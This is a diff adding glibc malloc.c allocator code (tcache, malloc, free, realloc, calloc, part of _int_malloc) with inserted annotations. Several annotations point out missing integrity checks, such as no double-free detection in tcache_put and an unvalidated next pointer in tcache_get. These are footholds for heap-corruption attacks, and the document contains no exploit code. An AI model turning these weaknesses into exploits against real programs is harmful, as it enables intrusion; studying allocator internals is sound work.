+   per-thread cache (hence "tcache_perthread_struct").  Keeping
+   overall size low is mildly important.  Note that COUNTS and ENTRIES
+   are redundant (we could have just counted the linked list each
+   time); this is for performance reasons.  */
+typedef struct tcache_perthread_struct
+{
+  char counts[TCACHE_MAX_BINS];
+  tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
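+/* Annotation (not part of upstream malloc.c): on a typical x86-64 build,
+   TCACHE_MAX_BINS is 64 and MALLOC_ALIGNMENT is 16, so the bins cover chunk
+   sizes 0x20 through 0x410 and each bin holds at most mp_.tcache_count
+   (7 by default) entries.  The struct itself is heap-allocated by
+   tcache_init() below, so it normally sits at the very start of a thread's
+   heap.  */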
+
+static __thread bool tcache_shutting_down = false;
+static __thread tcache_perthread_struct *tcache = NULL;
+
+/* Caller must ensure that we know tc_idx is valid and there's room
+   for more chunks.  */
+static __always_inline void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+  assert (tc_idx < TCACHE_MAX_BINS);
+  e->next = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e;
+  ++(tcache->counts[tc_idx]);
+}
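+/* Annotation (not part of upstream malloc.c): tcache_put is a plain LIFO
+   push onto a singly linked list.  In this version the helper performs no
+   double-free detection and does not itself enforce the per-bin count
+   limit; callers are expected to check tcache->counts[tc_idx] against
+   mp_.tcache_count before calling it.  */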
+
+/* Caller must ensure that we know tc_idx is valid and there are
+   chunks available to remove.  */
+static __always_inline void *
+tcache_get (size_t tc_idx)
+{
+  tcache_entry *e = tcache->entries[tc_idx];
+  assert (tc_idx < TCACHE_MAX_BINS);
+  assert (tcache->entries[tc_idx] > 0);
+  tcache->entries[tc_idx] = e->next;
+  --(tcache->counts[tc_idx]);
+  return (void *) e;
+}
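+/* Annotation (not part of upstream malloc.c): tcache_get pops the head
+   entry and installs e->next as the new head without validating it, so
+   whatever value is stored in the first entry's next field becomes the head
+   returned by a later call.  Note that the assert above tests the entries
+   pointer rather than the count.  */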
+
+static void
+tcache_thread_shutdown (void)
+{
+  int i;
+  tcache_perthread_struct *tcache_tmp = tcache;
+
+  if (!tcache)
+    return;
+
+  /* Disable the tcache and prevent it from being reinitialized.  */
+  tcache = NULL;
+  tcache_shutting_down = true;
+
+  /* Free all of the entries and the tcache itself back to the arena
+     heap for coalescing.  */
+  for (i = 0; i < TCACHE_MAX_BINS; ++i)
+    {
+      while (tcache_tmp->entries[i])
+	{
+	  tcache_entry *e = tcache_tmp->entries[i];
+	  tcache_tmp->entries[i] = e->next;
+	  __libc_free (e);
+	}
+    }
+
+  __libc_free (tcache_tmp);
+}
+
+static void
+tcache_init(void)
+{
+  mstate ar_ptr;
+  void *victim = 0;
+  const size_t bytes = sizeof (tcache_perthread_struct);
+
+  if (tcache_shutting_down)
+    return;
+
+  arena_get (ar_ptr, bytes);
+  victim = _int_malloc (ar_ptr, bytes);
+  if (!victim && ar_ptr != NULL)
+    {
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  /* In a low memory situation, we may not be able to allocate memory
+     - in which case, we just keep trying later.  However, we
+     typically do this very early, so either there is sufficient
+     memory, or there isn't enough memory to do non-trivial
+     allocations anyway.  */
+  if (victim)
+    {
+      tcache = (tcache_perthread_struct *) victim;
+      memset (tcache, 0, sizeof (tcache_perthread_struct));
+    }
+
+}
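+/* Annotation (not part of upstream malloc.c): the tcache_perthread_struct
+   is obtained with _int_malloc from the thread's arena like any other
+   chunk, then zeroed; for the main thread this is typically the first
+   allocation made on the heap.  */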
+
+# define MAYBE_INIT_TCACHE() \
+  if (__glibc_unlikely (tcache == NULL)) \
+    tcache_init();
+
+#else  /* !USE_TCACHE */
+# define MAYBE_INIT_TCACHE()
+
+static void
+tcache_thread_shutdown (void)
+{
+  /* Nothing to do if there is no thread cache.  */
+}
+
+#endif /* !USE_TCACHE  */
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+#if USE_TCACHE
+  /* int_free also calls request2size, be careful to not pad twice.  */
+  size_t tbytes;
+  checked_request2size (bytes, tbytes);
+  size_t tc_idx = csize2tidx (tbytes);
+
+  MAYBE_INIT_TCACHE ();
+
+  DIAG_PUSH_NEEDS_COMMENT;
+  if (tc_idx < mp_.tcache_bins
+      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
+      && tcache
+      && tcache->entries[tc_idx] != NULL)
+    {
+      return tcache_get (tc_idx);
+    }
+  DIAG_POP_NEEDS_COMMENT;
+#endif
+
+  if (SINGLE_THREAD_P)
+    {
+      victim = _int_malloc (&main_arena, bytes);
+      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (victim)));
+      return victim;
+    }
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
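+/* Annotation (not part of upstream malloc.c): __libc_malloc consults
+   __malloc_hook first, then tries the tcache bin selected by csize2tidx,
+   and only then calls _int_malloc -- on main_arena directly when
+   single-threaded, otherwise on an arena from arena_get with a single
+   retry in another arena on failure.  */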
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
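+/* Annotation (not part of upstream malloc.c): __libc_free dispatches to
+   __free_hook first and treats free(NULL) as a no-op.  Mmapped chunks are
+   released with munmap_chunk (possibly raising the dynamic mmap/trim
+   thresholds first); all other chunks go to _int_free on the arena that
+   owns them.  */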
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    {
+      MAYBE_INIT_TCACHE ();
+      ar_ptr = arena_for_chunk (oldp);
+    }
+
+  /* Little security check which won't hurt performance: the allocator
+     never wraps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+      malloc_printerr ("realloc(): invalid pointer");
+
+  checked_request2size (bytes, nb);
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+      assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+	      ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+      return newp;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
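+/* Annotation (not part of upstream malloc.c): after the hook, __libc_realloc
+   treats realloc(NULL, n) as malloc(n) and, with REALLOC_ZERO_BYTES_FREES,
+   realloc(p, 0) as free(p).  Mmapped chunks are grown with mremap or
+   copied; everything else goes through _int_realloc, with a final
+   malloc-copy-free fallback in another arena if that fails.  */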
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      p = _int_memalign (&main_arena, alignment, bytes);
+      assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (p)));
+
+      return p;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes = ALIGN_UP (bytes, pagesize);
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - 2 * pagesize - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T bytes, sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+
+  /* size_t is unsigned so the behavior on overflow is defined.  */
+  bytes = n * elem_size;
+#define HALF_INTERNAL_SIZE_T \
+  (((INTERNAL_SIZE_T) 1) << (8 * sizeof (INTERNAL_SIZE_T) / 2))
+  if (__builtin_expect ((n | elem_size) >= HALF_INTERNAL_SIZE_T, 0))
+    {
+      if (elem_size != 0 && bytes / elem_size != n)
+        {
+          __set_errno (ENOMEM);
+          return 0;
+        }
+    }
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      sz = bytes;
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  sz = bytes;
+
+  MAYBE_INIT_TCACHE ();
+
+  if (SINGLE_THREAD_P)
+    av = &main_arena;
+  else
+    arena_get (av, sz);
+
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (!SINGLE_THREAD_P)
+    {
+      if (mem == 0 && av != NULL)
+	{
+	  LIBC_PROBE (memory_calloc_retry, 1, sz);
+	  av = arena_get_retry (av, sz);
+	  mem = _int_malloc (av, sz);
+	}
+
+      if (av != NULL)
+	__libc_lock_unlock (av->mutex);
+    }
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+#if USE_TCACHE
+  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+#endif
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size traps (returning 0) request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  checked_request2size (bytes, nb);
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+#define REMOVE_FB(fb, victim, pp)			\
+  do							\
+    {							\
+      victim = pp;					\
+      if (victim == NULL)				\
+	break;						\
+    }							\
+  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
+	 != victim);					\
+
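+/* Annotation (not part of upstream malloc.c): REMOVE_FB pops the head chunk
+   of a fastbin without taking the arena lock, retrying a compare-and-exchange
+   until the bin head is swapped for victim->fd.  */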
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp;
+      victim = *fb;
+
+      if (victim != NULL)
+	{
+	  if (SINGLE_THREAD_P)
+	    *fb = victim->fd;
+	  else
+	    REMOVE_FB (fb, pp, victim);
+	  if (__glibc_likely (victim != NULL))
+	    {
+	      size_t victim_idx = fastbin_index (chunksize (victim));
+	      if (__builtin_expect (victim_idx != idx, 0))
+		malloc_printerr ("malloc(): memory corruption (fast)");
+	      check_remalloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	      /* While we're here, if we see other chunks of the same size,
+		 stash them in the tcache.  */
+	      size_t tc_idx = csize2tidx (nb);
+	      if (tcache && tc_idx < mp_.tcache_bins)
+		{
+		  mchunkptr tc_victim;
+
+		  /* While bin not empty and tcache not full, copy chunks.  */
+		  while (tcache->counts[tc_idx] < mp_.tcache_count
+			 && (tc_victim = *fb) != NULL)
+		    {
+		      if (SINGLE_THREAD_P)
+			*fb = tc_victim->fd;
+		      else
+			{
+			  REMOVE_FB (fb, pp, tc_victim);
+			  if (__glibc_unlikely (tc_victim == NULL))
+			    break;
+			}
+		      tcache_put (tc_victim, tc_idx);
+		    }
+		}
+#endif
+	      void *p = chunk2mem (victim);
+	      alloc_perturb (p, bytes);
+	      return p;
+	    }
+	}
+    }
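+  /* Annotation (not part of upstream malloc.c): the only integrity check on
+     a chunk recycled from a fastbin above is that its size maps back to the
+     same bin index; with tcache enabled, any remaining chunks of that size
+     are moved into the tcache before the first one is returned.  */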
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          bck = victim->bk;
+	  if (__glibc_unlikely (bck->fd != victim))
+	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
+          set_inuse_bit_at_offset (victim, nb);
+          bin->bk = bck;
+          bck->fd = bin;
+
+          if (av != &main_arena)
+	    set_non_main_arena (victim);
+          check_malloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (tc_victim = last (bin)) != bin)
+		{
+		  if (tc_victim != 0)
+		    {
+		      bck = tc_victim->bk;
+		      set_inuse_bit_at_offset (tc_victim, nb);
+		      if (av != &main_arena)
+			set_non_main_arena (tc_victim);
+		      bin->bk = bck;
+		      bck->fd = bin;
+
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
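+  /* Annotation (not part of upstream malloc.c): smallbins hold one size
+     each, so the fit above is exact.  Removing the victim verifies
+     bck->fd == victim (the "smallbin double linked list corrupted" check),
+     and with tcache enabled the rest of the bin is drained into the matching
+     tcache bin up to mp_.tcache_count entries.  */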
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs in which
+     it is called frequently otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (atomic_load_relaxed (&av->have_fastchunks))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is exact fit, or, if this is a small request, the chunk is remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+#if USE_TCACHE
+  INTERNAL_SIZE_T tcache_nb = 0;
+  size_t tc_idx = csize2tidx (nb);
+  if (tcache && tc_idx < mp_.tcache_bins)
+    tcache_nb = nb;
+  int return_cached = 0;
+
+  tcache_unsorted_count = 0;
+#endif
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          if (__builtin_expect (chunksize_nomask (victim) <= 2 * SIZE_SZ, 0)
+              || __builtin_expect (chunksize_nomask (victim)
+				   > av->system_mem, 0))
+            malloc_printerr ("malloc(): memory corruption");
+          size = chunksize (victim);
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+#if USE_TCACHE
+	      /* Fill cache first, return to user only if cache fills.
+		 We may return one of these chunks later.  */
+	      if (tcache_nb
+		  && tcache->counts[tc_idx] < mp_.tcache_count)
+		{
+		  tcache_put (victim, tc_idx);
+		  return_cached = 1;
+		  continue;
+		}
+	      else
+		{
+#endif
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+#if USE_TCACHE
+		}
+#endif
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#if USE_TCACHE
+      /* If we've processed as many chunks as we're allowed while
+	 filling the cache, return one of the cached ones.  */
+      ++tcache_unsorted_count;
+      if (return_cached
+	  && mp_.tcache_unsorted_limit > 0
+	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+#if USE_TCACHE
+      /* If all the small chunks we found ended up cached, return one now.  */
+      if (return_cached)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
